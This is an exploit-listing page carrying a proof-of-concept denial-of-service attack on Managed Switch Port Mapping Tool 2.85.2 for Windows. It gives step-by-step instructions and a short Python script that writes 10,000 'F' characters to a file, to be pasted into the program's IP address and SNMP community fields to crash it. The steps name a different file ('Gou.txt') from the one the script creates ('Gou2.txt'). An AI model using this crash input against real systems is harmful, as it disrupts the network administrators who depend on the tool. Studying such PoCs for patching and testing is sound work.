managed switch port mapping tool 2.85.2 denial of service (poc)
▸▸▸ Exploit & Vulnerability >> dos exploit & windows vulnerability
# Exploit Title: Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC) # Date: 2021-02-15 # Exploit Author: Ismael Nava # Vendor Homepage: https://switchportmapper.com/ # Software Link: https://switchportmapper.com/download.htm # Version: 2.85.2 # Tested on: Windows 10 Home x64 #STEPS # Open the program Managed Switch Port Mapping Tool # In the left side select Settings from Router/Srvr 1 (for layer 2 Switches) # Run the python exploit script, it will create a new .txt files # Copy the content of the file "Gou.txt" # Paste the content in the field IP Address and SNMP v1/v2c Read Community Name # Click in OK # End :) buffer = 'F' * 10000 try: file = open("Gou2.txt","w") file.write(buffer) file.close() print("Archive ready") except: print("Archive no ready")
Managed switch port mapping tool 2.85.2 denial of service (poc) Vulnerability / Exploit Source : Managed switch port mapping tool 2.85.2 denial of service (poc)